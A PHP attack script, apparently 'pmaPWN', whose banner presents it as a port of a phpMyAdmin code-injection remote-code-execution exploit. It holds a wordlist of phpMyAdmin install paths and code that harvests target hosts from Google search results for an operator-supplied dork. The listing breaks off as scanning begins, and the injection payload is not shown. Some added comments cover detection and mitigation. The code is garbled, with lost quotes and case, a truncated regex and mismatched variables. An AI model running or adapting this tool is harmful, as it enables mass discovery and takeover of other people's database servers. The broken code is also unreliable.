Format: php
<? Php
// Wordlist of candidate URL paths where a phpMyAdmin install (or a similar
// database admin panel) might live: generic names plus versioned directory
// names running from phpMyAdmin-2.2.3 to phpMyAdmin-2.8.2.
// NOTE(review): the string quotes, and apparently the original letter case,
// were lost in extraction, so this listing is not valid PHP as shown.
// NOTE(review): the code that consumes this list is outside this view;
// presumably each path is requested against every candidate host.
// Detection: one client requesting many of these paths in quick succession,
// mostly answered with 404, is a recognisable access-log signature of
// automated phpMyAdmin discovery.
// Mitigation: keep admin panels off guessable public paths (IP allow-list,
// VPN or front-end authentication) and delete leftover versioned install
// directories after upgrades.
$ List = array (
/Phpmyadmin /,
/PhpMyAdmin /,
/PMA /,
/Pma /,
/Admin /,
/Dbadmin /,
/Mysql /,
/Myadmin /,
/Phpmyadmin2 /,
/PhpMyAdmin2 /,
/PhpMyAdmin-2 /,
/Php-my-admin /,
/PhpMyAdmin-2.2.3 /,
/PhpMyAdmin-2.2.6 /,
/PhpMyAdmin-2.5.1 /,
/PhpMyAdmin-2.5.4 /,
/PhpMyAdmin-2.5.5-rc1 /,
/PhpMyAdmin-2.5.5-rc2 /,
/PhpMyAdmin-2.5.5 /,
/PhpMyAdmin-2.5.5-pl1 /,
/PhpMyAdmin-2.5.6-rc1 /,
/PhpMyAdmin-2.5.6-rc2 /,
/PhpMyAdmin-2.5.6 /,
/PhpMyAdmin-2.5.7 /,
/PhpMyAdmin-2.5.7-pl1 /,
/PhpMyAdmin-2.6.0-alpha /,
/PhpMyAdmin-2.6.0-alpha2 /,
/PhpMyAdmin-2.6.0-beta1 /,
/PhpMyAdmin-2.6.0-beta2 /,
/PhpMyAdmin-2.6.0-rc1 /,
/PhpMyAdmin-2.6.0-rc2 /,
/PhpMyAdmin-2.6.0-rc3 /,
/PhpMyAdmin-2.6.0 /,
/PhpMyAdmin-2.6.0-pl1 /,
/PhpMyAdmin-2.6.0-pl2 /,
/PhpMyAdmin-2.6.0-pl3 /,
/PhpMyAdmin-2.6.1-rc1 /,
/PhpMyAdmin-2.6.1-rc2 /,
/PhpMyAdmin-2.6.1 /,
/PhpMyAdmin-2.6.1-pl1 /,
/PhpMyAdmin-2.6.1-pl2 /,
/PhpMyAdmin-2.6.1-pl3 /,
/PhpMyAdmin-2.6.2-rc1 /,
/PhpMyAdmin-2.6.2-beta1 /,
// The next entry repeats the 2.6.2-rc1 entry two lines above.
/PhpMyAdmin-2.6.2-rc1 /,
/PhpMyAdmin-2.6.2 /,
/PhpMyAdmin-2.6.2-pl1 /,
/PhpMyAdmin-2.6.3 /,
/PhpMyAdmin-2.6.3-rc1 /,
// The next entry repeats the 2.6.3 entry two lines above.
/PhpMyAdmin-2.6.3 /,
/PhpMyAdmin-2.6.3-pl1 /,
/PhpMyAdmin-2.6.4-rc1 /,
/PhpMyAdmin-2.6.4-pl1 /,
/PhpMyAdmin-2.6.4-pl2 /,
/PhpMyAdmin-2.6.4-pl3 /,
/PhpMyAdmin-2.6.4-pl4 /,
/PhpMyAdmin-2.6.4 /,
/PhpMyAdmin-2.7.0-beta1 /,
/PhpMyAdmin-2.7.0-rc1 /,
/PhpMyAdmin-2.7.0-pl1 /,
/PhpMyAdmin-2.7.0-pl2 /,
/PhpMyAdmin-2.7.0 /,
/PhpMyAdmin-2.8.0-beta1 /,
/PhpMyAdmin-2.8.0-rc1 /,
/PhpMyAdmin-2.8.0-rc2 /,
/PhpMyAdmin-2.8.0 /,
/PhpMyAdmin-2.8.0.1 /,
/PhpMyAdmin-2.8.0.2 /,
/PhpMyAdmin-2.8.0.3 /,
/PhpMyAdmin-2.8.0.4 /,
/PhpMyAdmin-2.8.1-rc1 /,
/PhpMyAdmin-2.8.1 /,
/PhpMyAdmin-2.8.2 /,
/Sqlmanager /,
/Mysqlmanager /,
/P/m//,
/PMA2005 /,
/Pma2005 /,
/Phpmanager /,
/Php-myadmin /,
/Phpmy-admin /,
/Webadmin /,
/Sqlweb /,
/Websql /,
/Webdb /,
/Mysqladmin /,
/Mysql-admin /,
);
// Usage guard: when any command-line argument is supplied ($argc > 1) the
// script prints its banner and a usage line, then exits. The script takes no
// arguments; its search term is read interactively from STDIN further down.
// The banner names the tool (pmaPWN) and describes it as a PHP port of the
// phpMyAdmin code-injection exploit published at the milw0rm URL it prints.
// The same banner text is repeated verbatim right after this block.
If ($ argc> 1 ){
Print "| ************************************* * ************************** | ";
Print "pmaPWN. php-d3ck4, hacking.expose@gmail.com ";
Print "phpMyAdmin Code Injection RCE response & Exploit ";
Print "This is PHP version original http://milw0rm.com/exploits/8921 ";
Print "credit: Greg Ose, pagvac @ gnucitizen.org ";
Print "greetz: Hacking Expose !, HM Security, darkc0de ";
Print "| ************************************* * ************************** | ";
Print "";
Print "Usage: php $ argv [0]";
Exit;
}
// Normal start-up path: print the banner to the console.
Print "| ************************************* * ************************** | ";
Print "pmaPWN. php-d3ck4, hacking.expose@gmail.com ";
Print "phpMyAdmin Code Injection RCE response & Exploit ";
Print "This is PHP version original http://milw0rm.com/exploits/8921 ";
Print "credit: Greg Ose, pagvac @ gnucitizen.org ";
Print "greetz: Hacking Expose !, HM Security, darkc0de ";
Print "| ************************************* * ************************** | ";
Print "";
// Open the tool's log file in append mode, relative to the working directory,
// and write the same banner into it.
// Forensics: a log file with this name and banner text on a host is an
// artefact left by running the tool there. The space inside the file name is
// probably an extraction artefact.
$ Handlex = FOpen ("pmaPWN. log", "a + ");
FWrite ($ Handlex, "| ************************************** * ************************* | ");
FWrite ($ Handlex, "pmaPWN. php-d3ck4, hacking.expose@gmail.com ");
FWrite ($ Handlex, "phpMyAdmin Code Injection RCE response & Exploit ");
FWrite ($ Handlex, "This is PHP version original http://milw0rm.com/exploits/8921 ");
FWrite ($ Handlex, "credit: Greg Ose, pagvac @ gnucitizen.org ");
FWrite ($ Handlex, "greetz: Hacking Expose !, HM Security, darkc0de ");
FWrite ($ Handlex, "| ************************************** * ************************* | ");
// Prompt the operator for a search-engine query and read one trimmed line
// from STDIN.
Print "[-] Master, where you want to go today? ";
Print "[-] example dork: intitle: phpMyAdmin ";
Fwrite (STDOUT, "[pwn3r @ google ~] ./Dork-s ");
$ Dork = trim (fgets (STDIN ));
// Echo the query to the console and to the log. The SQL-looking text is only
// a decorative message; no database is queried in the visible code.
// NOTE(review): the value is assigned to `$ Dork` but interpolated as
// `$ dork`; PHP variable names are case-sensitive, so this mismatch is
// probably an extraction artefact.
Print "[!] QUERY: Select * FROM 'db db' Where 'keyword' = $ dork ";
FWrite ($ Handlex, "[!] QUERY: Select * FROM 'db db' Where 'keyword' = $ dork ");
// Result harvesting: ten iterations (start = 0, 100, ..., 900), each asking a
// Google Custom Search endpoint for up to 100 results for the operator's query.
// A fresh cURL handle is created and closed on every iteration.
For ($ I = 0; $ I <= 900; $ I + = 100 ){
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "http://www.google.com/cse? Cx = 013269018370076798483% 3Awdba3dlnxqm & q = $ dork & num = 100 & hl = en & as_qdr = all & start = $ I & sa = N ");
// Return the response as a string, allow up to 200 seconds, include the
// response headers in the output and follow redirects.
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ ch, CURLOPT_TIMEOUT, 200 );
Curl_setopt ($ ch, CURLOPT_HEADER, 1 );
Curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1 );
// Referer and User-Agent are hard-coded to imitate a desktop browser
// (Firefox 2.0.0.9 on Windows NT 5.1). These headers go to the search
// endpoint; requests to the harvested hosts are not visible in this listing.
// NOTE(review): the User-Agent literal lost its quotes in extraction.
Curl_setopt ($ ch, CURLOPT_REFERER, "http://google.com ");
Curl_setopt ($ ch, CURLOPT_USERAGENT, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 );
$ Pg = curl_exec ($ ch );
Curl_close ($ ch );
// NOTE(review): the pattern below is truncated. The regular expression and
// the code that stores matches (presumably into $res, which later code reads)
// are missing from this listing.
If (preg_match_all ("/
}
// Count every entry in the nested $res collection, report the total on the
// console and in the log, then close the log handle.
// NOTE(review): $res is never assigned in the visible code; it presumably
// holds the matches from the truncated preg_match_all call above.
// NOTE(review): the counter is incremented as `$ Total` but printed as
// `$ total`, and is never initialised in the visible code; the case mismatch
// is probably an extraction artefact.
Foreach ($ res as $ key ){
Foreach ($ key as $ target ){
$ Total ++;
}
}
Print "[+] Done. $ total rows return .";
FWrite ($ Handlex, "[+] Done. $ total rows return .");
FClose ($ Handlex );
Foreach ($ res as $ key ){
Foreach ($ key as $ target ){
$ Handlex = FOpen ("pmaPWN. log", "a + ");
$ Real = parse_url ($ target );
$ Url = "http: //". $ real [host];
Print "[-] Scanning phpMyAdmin